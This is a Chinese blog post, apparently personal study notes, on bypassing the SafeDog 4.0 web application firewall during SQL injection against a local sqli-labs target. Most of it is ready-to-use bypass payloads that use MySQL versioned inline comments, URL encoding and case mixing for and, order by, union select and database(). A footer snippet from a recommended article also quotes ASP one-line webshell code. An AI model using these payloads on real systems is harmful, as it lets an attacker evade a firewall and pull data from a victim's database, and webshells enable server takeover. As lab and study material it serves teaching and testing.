sql注入过狗

最新推荐文章于 2024-04-23 17:34:37 发布
最新推荐文章于 2024-04-23 17:34:37 发布
阅读量343 收藏 3
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43889136/article/details/124290066
版权

0x01前言

仅用作学习笔记,测试环境均为本地搭建。

0x02测试环境

Apache2.4+MySQL5.7

靶场:sqli-labs

安全狗4.0:安全狗这种基于正则的匹配还是比较好绕。

0x03绕过方法

绕过并不难,比如一些URL编码、大小写、16进制、内联注释、ASCII码、关键字替换等,这些基本方法大家都会,但是却绕不过。记住一句话:灵活组合有奇效!原理不写了。

1、and绕过

payload:?id=-1' and 1=1--+ 拦截

绕过payload:
?id=1' /*!44444and*/1=1--+
?id=1' and/*//*/1=1--+

存在但不仅限于这两种,灵活组合绕过方式多种多样。
其中
and => /*!44444and*/,这里面的版本44444,有很多版本数可以绕过,burpsuite进行fuzz一下。

and or 也可替换 && ||

2、order by绕过

order不拦截,by不拦截,但是组合起来就会拦截,所以还是老方法,灵活组合来绕过。

绕过payload:
?id=1' order/*//*/by 3--+

 

3、union select绕过

?id=-1' /*!union*//*//*//*!44444SelEct*/ 1,2,3--+
?id=-1'+union+distinct+select+ 1,2,3--+
?id=1'union (/*!/**/ SeleCT */ 1,2,3)--+

还有一种绕过方式,新get到的
union => /*!44444%75nion*/
select => /*!44444%%73elEcT*/

4、database()绕过

替换
database()=>/*!44444database/*/------/*/()*/

?id=-1%27%20/*!union*//*//*//*!44444Select*/%201,/*!44444database/*/------/*/()*/,3--+

0x04结语

变化太多太多了,我也只是写了一下自己的绕过,仅用于个人笔记。

详细的可以去看SQL注入绕过技巧_不常在河边走的博客-CSDN博客_sql注入绕过

Aligado0628
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入绕过
m0_47599604的博客
03-11 274
目录 asp木马收集 简单的aspx免杀 过狗的一句话 双写绕过 常见绕过思路 绕过空格的过滤 SQL注入防御 asp木马收集 <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Request(chr(35
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 938
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
Web安全——SQL注入漏洞
最新发布
2402_83242246的博客
04-23 685
web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。本质就是混淆数据和执行代码,使输入的数据变成可执行的语句。
sql注入安全狗(官网绕waf)【原创】
weixin_30237281的博客
03-26 454
作者:风之传说 给大家来个全新的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
安全SQL注入绕过
qq_38675102的博客
02-09 2358
安全狗waf绕过
SQL注入之打狗棒法(安全绕过
快吃小蛋糕吧的博客
10-28 1301
最近在网上挖洞时,总会遇到烦人的安全狗,研究了一天发现绕过安全狗出奇的简单,只需要语法犀利即可。 前言: 相信在网络上做渗透测试时,总会遇到如下情况: 这是网站管理员在服务器上安装了安全狗,安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗云安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带.
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
SQL注入攻击实操
12-24
### 步骤 3:有狗则通过 order by 绕过 攻击者可以通过 inject 恶意 SQL 代码 order by 1 到 order by 10 来判断 id 字段所在表的字段数目。如果在 order by 10 时报错,攻击者可以判断 id 字段所在表里有 9 个字段...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
最新棒SQLMAP 含过狗
07-06
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。
sql注入100种姿势过waf(二):过安全
weixin_30455365的博客
06-06 1005
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在数据库中执行 获取了全部数据 从返回的数据 我...
过狗脚本
wjy397的专栏
11-24 1141
简要描述: 习惯了,随手一个',就有这个漏洞。。。 自定义sqlmap脚本,可sql-shell 详细说明: 中国国际广播电视信息网络展览会 主站: code 区域 http://**.**.**.**bn.tv/ 介绍:http://**.**.**.**bn.tv/channels/4.html 漏洞url: code 区域 ht
SQL注入原理及绕过安全
whatiwhere的博客
04-23 2812
1.什么是SQL注入攻击   SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 http://www.xxx.com/list.php?id=1 http://www.xxx.com/list.php?id=1 and user()&gt;0 -- [ ] 哪里存在sql注入 GET,POST,HTTP头部注...
SQL注入绕过安全狗的五种方法
01-11 1268
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
SQL注入绕过安全
blackguest07的博客
01-12 2221
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL注入 安全狗apache3.5.12048版本绕过
crowsec
01-26 1196
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.04.28 前言 没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件,因为当时安装之后文件就删了,这次有,后台回复关键字: 安全狗3.5 获取 目前我们已经发布关于sql注入的文章和教学: 2019.11.20 更新sqli-labs 全部视频更新完成 SQL注入-安全狗超大数据包绕过 SQL...
【小迪安全】Day18-19web漏洞-SQL注入安全狗waf绕过
qq_44312640的博客
11-06 547
介绍了安全狗的绕过方法及思路。
sql注入绕过防火墙
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值